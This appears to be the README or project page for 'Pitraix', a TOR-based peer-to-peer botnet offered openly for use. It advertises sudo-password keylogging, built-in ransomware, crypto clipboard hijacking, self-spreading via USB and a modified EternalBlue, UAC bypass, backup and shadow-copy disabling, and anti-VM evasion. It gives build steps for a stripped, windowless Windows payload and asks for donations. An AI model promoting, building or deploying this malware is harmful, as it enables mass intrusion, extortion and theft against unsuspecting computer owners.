Modern Self-Modifying Cross-Platform Peer-to-Peer Botnet over TOR

  • By quicks
  • Last update: Sep 3, 2022
  • Comments: 0

English - עִברִית - العربيه - русский

I am not responsible for any damage you do using this!


  • Modern Cross-Platform HTTP-Based P2P Botnet over TOR that cannot be traced.

  • Design is based off "zero-trust" even malicious peers cannot do any damage while protecting operator identity. for more techincal information check spec.txt and wiki

  • Pitraix is able to handle millions of hosts, the limit is TOR network capacity

  • You can run Pitraix on a toaster and it will still work just as good with said millions of hosts, as the operative is one who sending requests, not recieving it and because there is no C2.

Built-in Crypter and self-spreading

  • Pitraix has ability to self modify own code which results in a completely different executable in terms of hash on every new infection

  • All is done automagically and does not need operator intervention.

Cross-platform with some sneaky 1-days

  • Pitraix works on Windows 7 all way to Windows 11 as well as linux

  • it has ability to automagically privilege escalate in both platforms

  • on Linux it does so by keylogging password when the host uses "sudo" or "doas"

  • on Windows it uses a modified version of UACME (work in progress)

  • *BSD support is work in progress

Dynamic Behaviour

  • Pitraix automagically chooses different persistence locations on every host as well as names of config file, pitraix name it's self and more are all dynamically generated to confuse anti-viruses

Anonymous and secure

  • Pitraix is coded in Golang which is memory safe and real fast. it's used by important companies such as: Google, Banks, Discord, etc

  • Pitraix is coded with extra security in mind to both protect the peer and the operator.

  • Hosts don't know each other. Not even their TOR onion address

  • Agents are Hosts that have been given TOR onion addresses of other Hosts, Agents relay instructions from Operative to Hosts. for more techincal information check spec.txt

  • Operatives are camaoflagued as agents to protect against advanced network timing and packets attacks over TOR


  • State-of-art encryption using AES-256 and Public-Key cryptography

  • Peer-to-Peer over TOR

  • Dynamic behaviour

  • Built-in crypter

  • Built-in keylogger that only picks interesting things

  • Built-in ransomware that never stores keys on HOST (I am not responsible how you use this)

  • Auto disable backup like Volume Shadow Copy, OneDrive and Windows Backup

  • Auto spreading to USBS, modified version of EternalBlue, and bunch other 1-days (work in progress)

  • Ability to hijack crypto addresses in clipboard

  • Readiable code easy to modify, not alot of scattered files

  • Colorful terminal-based interface for operatives

  • ZERO read/write to registry, thus lower detection

  • Time-based Anti-Debugging detection

  • Advanced VM detection

  • Extremely low system and internet requirements

  • Ability to capture Events. Events are anything interesting that happens on a host computer, currently it's tied only to keylogger

  • Ability to capture Logs. Logs are mainly used for debugging behaviour and errors

Picture of working OPER


  • For my GPG key please check gpg.asc

  • Anyone who claims to be me and don't haven't signed a message with that key is NOT me


  • This project is developed entirely by me in my free time, if you'd like to support me to keep updating, best way is via donating.

  • Monero: 85HjZpxZngajAEy2123NuXgu1PnNyq2DLSkkr93cyT8QQVae1GruhL4hHAtnaFqeCF7Vo9eW2P11Sig8DDqzVzCSE95NaW6

  • Bitcoin (segwit): bc1q2dqk9u06vv2j5p6yptj9ex7epfv77sxjygnrnw

Setting it up

  • Download latest Go version for your platform

  • Download files from releases and make sure they are all in same folder

  • Compile lyst for platform you want

  • Compile OPER (do NOT go run OPER.go! instead compile it THEN run the executable

  • After running OPER for first time, it should automagically generate and embed RSA keys and TOR addresses into lyst executable

  • OPER will automagically set up TOR. Make sure you don't already have a hidden service running on your device.

  • Example for a stripped, windowless lyst payload for windows: GOOS=windows go build -ldflags="-s -w -H=windowsgui" lyst_windows.go


  • Type "help" in OPER for list of commands


  • Please make sure you read spec.txt for more techincal information
  • If it's little bit slow it's due TOR network, TOR network is expected to be upgraded soon and thus speed should be greatly improved then
  • TOR binary from Torproject (which Pitraix uses) is signed and thus does not affect detection rate negatively

Future & Terms definition

  • Please read spec.txt for list of terms and their respective meaning alongside tons of useful information for anybody even thinking of editing source code